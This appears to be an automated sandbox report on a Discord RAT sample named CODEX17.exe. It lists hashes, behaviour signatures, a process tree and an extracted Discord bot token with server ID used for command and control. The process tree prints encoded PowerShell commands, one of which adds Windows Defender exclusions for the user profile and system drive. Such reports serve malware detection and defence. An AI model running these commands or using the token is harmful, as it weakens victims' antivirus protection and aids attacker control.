Analysis
-
max time kernel
13s -
max time network
14s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
11-12-2024 14:13
Static task
static1
Behavioral task
behavioral1
Sample
CODEX17.exe
Resource
win11-20241007-en
General
-
Target
CODEX17.exe
-
Size
307KB
-
MD5
53cc7337eed07bbbe0172f0b64bc6245
-
SHA1
9b0ac7e0eaffdb6ed8af1501939f40bd798f6be0
-
SHA256
1e5a4524dab6f1e4125043a7cdcfb6874c32a0514941ec4a90211f53efeef058
-
SHA512
ff2ec069d7877fdc646dfaaba4d9525ef71c04c93936accdd1bc1bfe9ab873ab27cceb9c2d34d25f3b3e6d4e6bb4ece707b797d2f5672d73583e21a361fb333d
-
SSDEEP
6144:m2EUicOFEG3AFDmDbpM6/XETGNNjyhRJNJC32XENQ8NvN:m2rOXTfpNg+
Malware Config
Extracted
discordrat
-
discord_token
MTMwODQxMjQ0MjIyODk1MzIwMA.GV9W16.iYVXo71VO-dFm-6aOmZjrpuYUGqFHWVGtkvM5Q
-
server_id
1316071968298111026
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Executes dropped EXE 1 IoCs
pid Process 4252 Client-built.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 discord.com 1 discord.com 3 discord.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CODEX17.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2088 powershell.exe 2088 powershell.exe 4652 powershell.exe 4652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 4252 Client-built.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3272 wrote to memory of 2088 3272 CODEX17.exe 77 PID 3272 wrote to memory of 2088 3272 CODEX17.exe 77 PID 3272 wrote to memory of 2088 3272 CODEX17.exe 77 PID 3272 wrote to memory of 4652 3272 CODEX17.exe 79 PID 3272 wrote to memory of 4652 3272 CODEX17.exe 79 PID 3272 wrote to memory of 4652 3272 CODEX17.exe 79 PID 3272 wrote to memory of 4252 3272 CODEX17.exe 81 PID 3272 wrote to memory of 4252 3272 CODEX17.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"C:\Users\Admin\AppData\Local\Temp\CODEX17.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaABrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAaABiACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAaABoAG4AIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaAB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQB0ACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
17KB
MD57b995959b3b9399f14a1e1a3dc000fd6
SHA12b3c3975298c086465788028a7b4bbdf83437e4b
SHA25646211ee1fcedcf49ec348509edf6a73526e80eb95f800073a01e5bcca6e38236
SHA512fef9ff15b4ab89ae1a64f6b1071e17188009f0b581eb318754eab95b5c57269c4b8e6e7f9afc75629776bde6620e2e4bc7ebda225297afc125850cd91056c658
-
Filesize
78KB
MD5eef37e61081aca867be51dab8d02c732
SHA1b58736f3eb07dedd144e61a8e38802de1c15b947
SHA256d74aed2a699c0ad2be01c761918ddcd5486bcf331a0a54a02bed4e073bdb39a8
SHA51208555aeb12b54264370e1e4154a7509efe21b84fbe5aa1fd4c322b22886a149adeaa3ff7e9b1b54f9c1ccd1dcc9ae32e5702c876b9ed1b58f63a9a1c61425078
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82